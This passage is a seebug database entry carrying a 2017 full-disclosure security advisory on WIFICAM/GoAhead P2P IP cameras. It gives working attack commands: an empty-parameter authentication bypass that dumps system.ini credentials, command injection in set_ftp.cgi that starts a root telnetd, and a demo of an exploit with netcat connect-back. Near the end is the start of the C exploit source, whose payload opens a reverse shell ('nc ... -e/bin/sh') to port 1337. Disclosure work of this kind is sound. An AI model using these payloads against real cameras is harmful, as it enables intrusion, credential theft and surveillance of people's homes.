network-b.ini -> /system/www/network.ini\r\nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 network.ini -> /system/www/network.ini\r\nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 system-b.ini -> /system/www/system.ini\r\nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 system.ini -> /system/www/system.ini\r\n/tmp/web #\r\n\r\n```\r\n\r\nWith valid credentials, an attacker can retrieve the configuration, as shown below:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://admin:admin@192.168.1.107/system.ini'|xxd\r\n\r\n[...]\r\n000001d0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n000001e0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n000001f0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n00000200: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n00000210: ffff ffff ffff ffff ffff ffff 7b6f 1158 ............{o.X\r\n00000220: 0000 0000 0100 0000 7469 6d65 2e6e 6973 ........time.nis\r\n00000230: 742e 676f 7600 0000 0000 0000 0000 0000 t.gov...........\r\n00000240: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000250: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000270: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n[...]\r\n00000640: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000650: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000660: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000680: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006d0: 030a 0a0f 8000 0000 0101 0003 0002 0000 ................\r\n[...]\r\nuser@kali$\r\n\r\n```\r\n\r\nTo browse `.cgi` files, an attacker needs to authenticate too:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS'\r\nvar result=\"Auth Failed\";\r\nuser@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse&loginpas'\r\nvar result=\"Auth Failed\";\r\n\r\n```\r\n\r\nBut it appears access to `.ini` files are not correctly checked. The attacker can bypass the authentication by providing an empty `loginuse` and an empty `loginpas` in the URI:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/system.ini?loginuse&loginpas'|xxd|less\r\n00000000: 5749 4649 4341 4d00 0000 0000 0000 0000 WIFICAM.........\r\n00000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000020: 0000 0100 0000 0000 0000 0000 0000 0000 ................\r\n[...]\r\n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n[...]\r\n\r\n```\r\n\r\nA PoC is provided:\r\n\r\n```\r\n./expl 192.168.1.107 --get-config | xxd | grep 000003\r\n\r\n00000030: 6d53 6563 0a0a 5b2b 5d20 6279 7061 7373 mSec..[+] bypass\r\n00000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000310: 0000 0000 0000 0000 0000 0000 0a0a 0a0a ................\r\n00000320: 0100 0000 0a03 0100 0000 0000 0000 0000 ................\r\n00000330: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003a0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin.\r\n000003b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003c0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin.\r\n000003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003e0: 0000 0000 0000 0000 0000 030a 0a0f 8000 ................\r\n000003f0: 0000 0101 0003 0002 0000 0080 8080 8001 ................\r\n\r\n```\r\n\r\nThis vulnerability allows an attacker to steal credentials, ftp accounts and smtp accounts (email).\r\n\r\n<a id=\"root-rce\"></a>\r\n\r\n## Details - Authenticated RCE as root\r\n\r\nA RCE exists in the ftp configuration CGI. This is well-documented as shown [here](https://jumpespjump.blogspot.de/2015/09/how-i-hacked-my-ip-camera-and-found.html) and [here](https://www.pentestpartners.com/blog/hacking-the-aldi-ip-cctv-camera-part-2/) in several different camera models.\r\n\r\nThe partition `/` is mounted in Read-Only, so modifications are not possible in this partition.\r\n\r\nThe command injection is located in in `set_ftp.cgi` (see `$(ftp x.com)`):\r\n\r\n```\r\nhttp://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(ftp x.com)ftp&dir=/&mode=PORT&upload_interval=0\r\nhttp://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin\r\n\r\n```\r\n\r\nWhen doing a tcpdump, we can see the DNS resolution for x.com:\r\n\r\n```\r\n00:00:00.151107 IP 192.168.1.107.33551 > 8.8.8.8.53: 40888+ A? x.com. (23)\r\n\r\n```\r\n\r\nso, `ftp x.com` is executed.\r\n\r\nWe can use the telnetd binary to start an authenticated-less telnetd access:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'\r\nuser@kali$ wget -qO- 'http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'\r\n\r\n```\r\n\r\nTesting this will give us root account on port 25/tcp:\r\n\r\n```\r\nuser@kali$ telnet 192.168.1.107 25\r\nTrying 192.168.1.107...\r\nConnected to 192.168.1.107.\r\nEscape character is '^]'.\r\n\r\n/ # id\r\nuid=0(root) gid=0\r\n/ # uname -ap\r\nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux\r\n/ # mount\r\nrootfs on / type rootfs (rw)\r\n/dev/root on / type squashfs (ro,relatime)\r\n/proc on /proc type proc (rw,relatime)\r\nsysfs on /sys type sysfs (rw,relatime)\r\ntmpfs on /dev type tmpfs (rw,relatime,size=2048k)\r\ntmpfs on /tmp type tmpfs (rw,relatime,size=5120k)\r\ndevpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)\r\n/dev/mtdblock3 on /system type jffs2 (rw,relatime)\r\n/ #\r\n\r\n```\r\n\r\n`/etc` is in read-only. So, command injection must not write into `/etc`. The injection is located in `/tmp/ftpupload.sh`:\r\n\r\n```\r\n/ # cat /tmp/ftpupload.sh \r\n/bin/ftp -n<<!\r\nopen 192.168.1.1 21\r\nuser ftp $(telnetd -l /bin/sh -p 25)ftp\r\nbinary\r\nlcd /tmp\r\nput ftptest.txt\r\nclose\r\nbye\r\n!\r\n/ #\r\n\r\n```\r\n\r\n<a id=\"pre-auth-root-rce\"></a>\r\n\r\n## Details - Pre-Auth RCE as root\r\n\r\nBy combining the Pre-Auth Info Leak within the GoAhead http server vulnerability and then authenticated RCE as root, an attacker can achieve a pre-auth RCE as root on a LAN or on the Internet.\r\n\r\nAn exploit is provided and can be used to get a root RCE with connect-back.\r\n\r\nThe exploit will:\r\n\r\n1. extract the valid credentials by connecting to the remote GoAhead HTTP server of the targeted camera\r\n2. plant a connect-back with `nc`\r\n3. execute the payload\r\n4. the attacker will receive a root shell with netcat on a second terminal\r\n5. clean the payload located in the configuration file\r\n\r\nIt affects 1250+ camera models.\r\n\r\nDemo:\r\n\r\n```\r\nuser@kali$ gcc -Wall -o expl expl-goahead-camera.c && ./expl 192.168.1.107 \r\nCamera 0day root RCE with connect-back @PierreKimSec\r\n\r\nPlease run `nc -vlp 1337` on 192.168.1.1\r\n\r\n[+] bypassing auth ... done\r\n login = admin\r\n pass = admin\r\n[+] planting payload ... done\r\n[+] executing payload ... done\r\n[+] cleaning payload ... done\r\n[+] cleaning payload ... done\r\n[+] enjoy your root shell on 192.168.1.1:1337\r\nuser@kali$\r\n\r\n```\r\n\r\nOn the second xterm:\r\n\r\n```\r\nuser@kali$ nc -lvp 1337\r\nlistening on [any] 1337 ...\r\n192.168.1.107: inverse host lookup failed: Unknown host\r\nconnect to [192.168.1.1] from (UNKNOWN) [192.168.1.107] 47968\r\nid\r\nuid=0(root) gid=0\r\nuname -ap\r\nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux\r\nps \r\nPID USER TIME COMMAND\r\n 1 root 0:01 {linuxrc} init\r\n 2 root 0:00 [kthreadd]\r\n 3 root 0:00 [ksoftirqd/0]\r\n 5 root 0:00 [kworker/0:0H]\r\n 6 root 0:00 [kworker/u2:0]\r\n 7 root 0:00 [rcu_preempt]\r\n 8 root 0:00 [rcu_bh]\r\n 9 root 0:00 [rcu_sched]\r\n 10 root 0:00 [watchdog/0]\r\n 11 root 0:00 [khelper]\r\n 12 root 0:00 [writeback]\r\n 13 root 0:00 [bioset]\r\n 14 root 0:00 [kblockd]\r\n 15 root 0:00 [khubd]\r\n 16 root 0:00 [kworker/0:1]\r\n 17 root 0:00 [cfg80211]\r\n 18 root 0:00 [rpciod]\r\n 19 root 0:00 [kswapd0]\r\n 20 root 0:00 [fsnotify_mark]\r\n 21 root 0:00 [nfsiod]\r\n 22 root 0:00 [crypto]\r\n 36 root 0:00 [kworker/u2:1]\r\n 39 root 0:00 [i2s_work_1]\r\n 40 root 0:00 [i2s_codec_irq_w]\r\n 41 root 0:00 [kworker/0:2]\r\n 42 root 0:00 [deferwq]\r\n 43 root 0:00 [kworker/0:1H]\r\n 59 root 0:00 [jffs2_gcd_mtd3]\r\n 61 root 0:00 telnetd\r\n 69 root 0:00 /system/system/bin/wifidaemon\r\n 70 root 0:00 /sbin/getty -L ttyS1 115200 vt100\r\n 98 root 0:01 [RtmpTimerTask]\r\n 99 root 0:00 [RtmpMlmeTask]\r\n 100 root 0:00 [RtmpCmdQTask]\r\n 101 root 0:00 [RtmpWscTask]\r\n 148 root 1:19 /tmp/encoder\r\n 164 root 0:00 [irq/37-isp]\r\n 236 root 0:07 [apical_isp_fw_p]\r\n 2330 root 0:00 sh -c /tmp/ftpupload.sh > /tmp/ftpret.txt\r\n 2331 root 0:00 {exe} ash /tmp/ftpupload.sh\r\n 2332 root 0:00 {exe} ash /tmp/ftpupload.sh\r\n 2333 root 0:00 /bin/ftp -n\r\n 2334 root 0:00 /bin/sh\r\n 2439 root 0:00 ps\r\n\r\n```\r\n\r\nDetails -- Misc - \"Cloud\" (Aka Botnet)\r\nBy default, the camera uses a 'Cloud' functionality.\r\n\r\nYou can tcpdump the traffic of the camera, which is very scary:\r\n```\r\n12:09:21.410947 IP 192.168.1.107.46958 > 8.8.8.8.53: 60806+ A? openapi.xg.qq.com.gateway. (43)\r\n12:09:26.429697 IP 192.168.1.107.58156 > 202.96.134.33.53: 60806+ A? openapi.xg.qq.com.gateway. (43)\r\n12:09:31.450033 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)\r\n12:09:35.128919 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48\r\n12:09:35.128932 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48\r\n12:09:35.128933 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48\r\n12:09:36.468849 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)\r\n12:09:41.488223 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)\r\n12:09:46.507810 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)\r\n12:09:51.527501 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:09:56.546854 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:01.566316 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:06.575735 ARP, Request who-has 192.168.1.1 tell 192.168.1.107, length 46\r\n12:10:06.575750 ARP, Reply 192.168.1.1 is-at 00:e0:4c:51:55:ed, length 28\r\n12:10:06.585841 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:11.606030 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)\r\n12:10:16.625044 IP 192.168.1.107.44109 > 202.96.134.33.53: 41046+ A? time.nist.gov. (31)\r\n12:10:19.214687 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48\r\n12:10:19.214700 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48\r\n12:10:19.214702 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48\r\n12:10:21.644397 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)\r\n```\r\n\r\nThe camera tries to resolve `www.baidu.com`, `openapi.xg.qq.com`, contacts hardcoded IPs and hosts:\r\n\r\n* `121.42.208.86:32100/udp` (CN: Alibaba),\r\n* `54.221.213.97:32100/udp` (AWS US),\r\n* `120.24.37.48:32100/udp` (CN: Alibaba),\r\n* `www.baidu.com:80/tcp` (CN: Baidu).\r\n\r\nIt appears this is the 'Cloud' functionality, enabled by default. The security of this functionality is not proven.\r\n\r\nThe provided Android application to manage my camera is [object.p2pwificam.client.apk](https://play.google.com/store/apps/details?id=object.p2pwificam.client).\r\n\r\n\r\n\r\n\r\n\r\nNetcam 360 works too:\r\n\r\n\r\n\r\nIt appears, the network protocol is very weak:\r\n\r\n1. the camera contacts a remote server using UDP,\r\n2. the application contacts a remote server using UDP,\r\n3. the application sends a request to the remote server, asking if the camera with the specific serial-number is online,\r\n4. the server will reply by \"camera doesn't exit\", \"camera is offline\" or \"camera is online\",\r\n5. if the camera is online, a UDP tunnel is automaticaly established between the application and the camera, using the Cloud server as a relay.\r\n\r\n### UDP tunnel:\r\n\r\n```\r\n[Android Application] <===UDP===> Cloud server <===UDP===> [Camera]\r\n\r\n```\r\n\r\nThen, the UDP tunnel is used by the application to reach the camera:\r\n\r\n1/ the client will send a HTTP request to the camera with the credentials (still in clear-text)\r\n\r\n```\r\nGET check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nor\r\n\r\n```\r\nGET /check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\n2/ the camera will reply by using HTTP over UDP whenever the credentials are valid or invalid.\r\n\r\nIf the credentials are valid, the camera will reply:\r\n\r\n```\r\nresult= 0;\r\n\r\n```\r\n\r\nIf the credentials are not valid, the camera will reply:\r\n\r\n```\r\nresult=-1\r\n\r\n```\r\n\r\n3/ if the credentials are valid, then the application will send HTTP requests to .cgi files hosted by the camera by appending credentials to the requests (`?loginuse=valid_user&loginpas=valid_pass`)\r\n\r\n### Step 2 in detail:\r\n\r\nIf the authentication is OK, so it is alright to dump all the configuration in cleartext!\r\n\r\n\r\n\r\nNote: this trace was done with one of the application listed below, to be sure applications are sharing the same \"cloud\" network (it appears the daemon running on the camera doesn't strictly respect the HTTP protocol - note the lack of `/` - but it works !).\r\n\r\nIf the authentication is not OK. The cameras answers:\r\n\r\n```\r\nresult=-1;\r\n\r\n```\r\n\r\nDue to the absence of checking, an attacker can simply bruteforce credentials.\r\n\r\n\r\n\r\n### Step 3 in detail:\r\n\r\nThe application sends:\r\n\r\n```\r\nGET get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nOR\r\n\r\n```\r\nGET /get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nThe camera replies by sending all its configuration in clear-text:\r\n\r\n```\r\nvar now=1122211111;\r\nvar dst_enable=0;\r\nvar dst_time=0;\r\nvar tz=0;\r\nvar ntp_enable=1;\r\nvar ntp_svr=\"time.nist.gov\";\r\nvar dhcpen=1;\r\nvar ip=\"192.168.2.76\";\r\nvar mask=\"255.255.255.0\";\r\nvar gateway=\"192.168.2.1\";\r\nvar dns1=\"8.8.8.8\";\r\nvar dns2=\"192.168.2.1\";\r\nvar port=80;\r\nvar nashost=\"\";\r\nvar nasport=0;\r\nvar dev2_host=\"\";\r\nvar dev2_alias=\"\";\r\nvar dev2_user=\"\";\r\nvar dev2_pwd=\"\";\r\nvar dev2_port=0;\r\nvar dev3_host=\"\";\r\nvar dev3_alias=\"\";\r\nvar dev3_user=\"\";\r\nvar dev3_pwd=\"\";\r\nvar dev3_port=0;\r\nvar dev4_host=\"\";\r\nvar dev4_alias=\"\";\r\nvar dev4_user=\"\";\r\nvar dev4_pwd=\"\";\r\nvar dev4_port=0;\r\nvar dev5_host=\"\";\r\nvar dev5_alias=\"\";\r\nvar dev5_user=\"\";\r\nvar dev5_pwd=\"\";\r\nvar dev5_port=0;\r\nvar dev6_host=\"\";\r\nvar dev6_alias\r\n[...]\r\nvar user1_name=\"\";\r\nvar user1_pwd=\"\";\r\nvar user2_name=\"wut\";\r\nvar user2_pwd=\"wut\";\r\nvar user3_name=\"admin\";\r\nvar user3_pwd=\"admin\";\r\n[...]\r\n\r\n```\r\n\r\nThis is interesting because an attacker can reach a camera only by knowing a serial number. The UDP tunnel between the attacker and the camera is established even if the attacker doesn't know the credentials. It's useful to note the tunnel bypasses NAT and firewall, allowing the attacker to reach internal cameras (if they are connected to the Internet) and to bruteforce credentials. Then, the attacker can just try to bruteforce credentials of the camera:\r\n\r\n```\r\nGET /get_params.cgi?&loginuse=admin&loginpas=TEST&user=admin&pwd=TEST&\r\n\r\n```\r\n\r\nThis protocol appears to be common to a lot of Android applications, ie:\r\n\r\n* [object.p2pwificam.client](https://play.google.com/store/apps/details?id=object.p2pwificam.client) (500.000 - 1.000.000 installations)\r\n* [hsl.p2pipcam](https://play.google.com/store/apps/details?id=hsl.p2pipcam) (100.000 - 500.000 installations)\r\n* [object.liouzx.client](https://play.google.com/store/apps/details?id=object.liouzx.client) (100.000 - 500.000 installations)\r\n* [object.lioupp.client](https://play.google.com/store/apps/details?id=object.lioupp.client) (100.000 - 500.000 installations)\r\n* [com.g_zhang.myp2pcam](https://play.google.com/store/apps/details?id=com.g_zhang.myp2pcam) (100.000 - 500.000 installations)\r\n* [object.aisaidezx.client](https://play.google.com/store/apps/details?id=object.aisaidezx.client) (50.000 - 100.000 installations)\r\n* [hsl.cam360](https://play.google.com/store/apps/details?id=hsl.cam360) (10.000 - 50.000 installations)\r\n* [bravocam.p2pipcam](https://play.google.com/store/apps/details?id=bravocam.p2pipcam) (10.000 - 50.000 installations)\r\n* [xcam.p2pipcam](https://play.google.com/store/apps/details?id=xcam.p2pipcam) (10.000 - 50.000 installations)\r\n* [snugcam.p2pipcam](https://play.google.com/store/apps/details?id=snugcam.p2pipcam) (10.000 - 50.000 installations)\r\n* [myview.p2pipcam](https://play.google.com/store/apps/details?id=myview.p2pipcam) (5.000 - 10.000 installations)\r\n* [object.weimaisizx.client](https://play.google.com/store/apps/details?id=object.weimaisizx.client) (10.000 - 50.000 installations)\r\n* [com.tutk.P2PCamLive.Pixord](https://play.google.com/store/apps/details?id=com.tutk.P2PCamLive.Pixord) (10.000 - 50.000 installations)\r\n* [object.p2pnetwork.client](https://play.google.com/store/apps/details?id=object.p2pnetwork.client) (5.000 - 10.000 installations)\r\n\r\nThis list is very far from being complete.\r\n\r\nSo, I modified the original Android Application in order to try the pre-auth Info-Leak vulnerability:\r\n\r\n```\r\nk% ls -la\r\ntotal 14912\r\ndrwx------ 2 nobody nogroup 100 Mar 7 08:27 .\r\ndrwxrwxrwt 3 root root 140 Mar 7 08:25 ..\r\n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool\r\n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar\r\n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk\r\nk% ./apktool d object.p2pwificam.client.apk\r\nI: Using Apktool 2.2.2 on object.p2pwificam.client.apk\r\nI: Loading resource table...\r\nI: Decoding AndroidManifest.xml with resources...\r\nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...\r\nS: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable\r\nI: Loading resource table from file: /tmp/.local/share/apktool/framework/1.apk\r\nI: Regular manifest package...\r\nI: Decoding file-resources...\r\nI: Decoding values */* XMLs...\r\nI: Baksmaling classes.dex...\r\nI: Copying assets and libs...\r\nI: Copying unknown files...\r\nI: Copying original files...\r\nk%\r\n\r\n```\r\n\r\nI edit the library which manages all the custom HTTP requests.\r\n\r\nOne of the interesting string is `GET /%sloginuse=%s&loginpas=%s&user=%s&pwd=%s`:\r\n\r\n```\r\nk% xxd ./object.p2pwificam.client/lib/armeabi/libobject_jni.so\r\n\r\n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \r\n0001f660: 2f25 736c 6f67 696e 7573 653d 2573 266c /%sloginuse=%s&l\r\n0001f670: 6f67 696e 7061 733d 2573 2675 7365 723d oginpas=%s&user=\r\n0001f680: 2573 2670 7764 3d25 7326 0000 4449 443a %s&pwd=%s&..DID:\r\n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com\r\n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con\r\n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s.\r\n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai\r\n0001f6d0: 6c65 642e 2e20 2573 2072 6574 7572 6e3a led.. %s return:\r\n0001f6e0: 2025 6400 5265 436f 6e6e 6563 7443 6f75 %d.ReConnectCou\r\n0001f6f0: 6e74 3a20 2564 0a00 5050 5050 5f43 6f6e nt: %d..PPPP_Con\r\n0001f700: 6e65 6374 2073 7563 6365 7373 2e2e 2e6d nect success...m\r\n0001f710: 5f68 5365 7373 696f 6e48 616e 646c 653a _hSessionHandle:\r\n\r\n```\r\n\r\nAfter the modification:\r\n\r\n```\r\n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \r\n0001f660: 2f73 7973 7465 6d2e 696e 693f 6c6f 6769 /system.ini?logi\r\n0001f670: 6e75 7365 266c 6f67 696e 7061 7373 2678 nuse&loginpass&x\r\n0001f680: 7878 7878 7878 7878 7826 0000 4449 443a xxxxxxxxx&..DID:\r\n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com\r\n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con\r\n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s.\r\n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai\r\n\r\n```\r\n\r\nThen, let's repack and sign the .apk:\r\n\r\n```\r\nk% ./apktool b object.p2pwificam.client\r\nI: Using Apktool 2.2.2\r\nI: Checking whether sources has changed...\r\nI: Checking whether resources has changed...\r\nI: Building resources...\r\nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...\r\nS: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable\r\nW: warning: string 'conectar' has no default translation.\r\nW: warning: string 'str_ipcamfour' has no default translation.\r\nW: warning: string 'user_pwd_no_show' has no default translation.\r\nI: Copying libs... (/lib)\r\nI: Building apk file...\r\nI: Copying unknown files/dir...\r\nk% openssl genrsa -out key.pem\r\n\r\nGenerating RSA private key, 2048 bit long modulus\r\n..........................................+++\r\n...................................................................+++\r\nunable to write 'random state'\r\ne is 65537 (0x010001)\r\nk% openssl req -new -key key.pem -out request.pem\r\n[...]\r\nk% openssl x509 -req -days 9999 -in request.pem -signkey key.pem -out certificate.pem\r\nSignature ok\r\nsubject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd\r\nGetting Private key\r\nunable to write 'random state'\r\nk% openssl pkcs8 -topk8 -outform DER -in key.pem -inform PEM -out key.pk8 -nocrypt\r\nk% signapk certificate.pem key.pk8 object.p2pwificam.client/dist/object.p2pwificam.client.apk signed-object.p2pwificam.client.apk\r\nk% ls -latr\r\ntotal 21560\r\ndrwxrwxrwt 3 root root 140 Mar 7 08:25 ..\r\n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar\r\n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool\r\n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk\r\ndrwx------ 9 nobody nogroup 220 Mar 7 08:33 object.p2pwificam.client\r\n-rw------- 1 nobody nogroup 1675 Mar 7 08:33 key.pem\r\n-rw------- 1 nobody nogroup 956 Mar 7 08:33 request.pem\r\n-rw------- 1 nobody nogroup 1111 Mar 7 08:33 certificate.pem\r\n-rw------- 1 nobody nogroup 1217 Mar 7 08:33 key.pk8\r\ndrwx------ 3 nobody nogroup 220 Mar 7 08:34 .\r\n-rw------- 1 nobody nogroup 6787146 Mar 7 08:34 signed-object.p2pwificam.client.apk\r\n\r\n```\r\n\r\n`signed-object.p2pwificam.client.apk` is ready to be used.\r\n\r\nWhen using it, we see that:\r\n\r\nThe client indeed sends the `system.ini` request within the UDP tunnel:\r\n\r\n\r\n\r\nThe camera indeed receives this request within the UDP tunnel:\r\n\r\n\r\n\r\nComplete trace is:\r\n\r\n\r\n\r\nIt appears the pre-auth is not easily reachable within the cloud network.\r\n\r\nThis \"cloud\" protocol seems to be more a botnet protocol than a legit remote access protocol and has indeed weakness (everything in clear-text, i.e. an attacker can attack cameras within the cloud and leverage potential access to hack internal networks).\r\n\r\nA lot of P2P ('Cloud') cameras are in fact using the same botnet protocols and the same infrastructure seemingly to be managed by a single entity.\r\n\r\nWriting a PoC which bruteforces credentials of the remote camera is left as an exercise for the reader.\r\n\r\n## Vendor Response\r\n\r\nDue to difficulties in finding and contacting all the vendors, full-disclosure is applied.\r\n\r\n**I advise to IMMEDIATELY DISCONNECT cameras to the Internet. Hundreds of thousands cameras are affected by the 0day Info-Leak. Millions of them are using the insecure Cloud network.**\r\n\r\n## Report Timeline\r\n\r\n* Feb 26, 2017: Vulnerabilities found by Pierre Kim.\r\n* Mar 08, 2017: A public advisory is sent to security mailing lists.\r\n\r\n## Credits\r\n\r\nThese vulnerabilities were found by Pierre Kim ([@PierreKimSec](https://twitter.com/PierreKimSec)).\r\n\r\n## References\r\n\r\n[https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt](https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt)\r\n\r\n[https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html](https://pierrekim.github.io/blog/2017-03-06-camera-goahead-0day.html)\r\n\r\n## Disclaimer\r\n\r\nThis advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: [http://creativecommons.org/licenses/by-nc-sa/3.0/](http://creativecommons.org/licenses/by-nc-sa/3.0/)", "modified": "2017-03-08T00:00:00", "published": "2017-03-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92748", "id": "SSV:92748", "type": "seebug", "title": "The Wireless IP Camera (P2P) WIFICAM Multiple vulnerabilities", "sourceData": "\n #include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n#define CAM_PORT 80\r\n#define REMOTE_HOST \"192.168.1.1\"\r\n#define REMOTE_PORT \"1337\"\r\n#define PAYLOAD_0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20\" REMOTE_HOST \"+\" REMOTE_PORT \"%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define PAYLOAD_1 \"GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\\r\\n\\r\\n\"\r\n#define PAYLOAD_2 \"GET 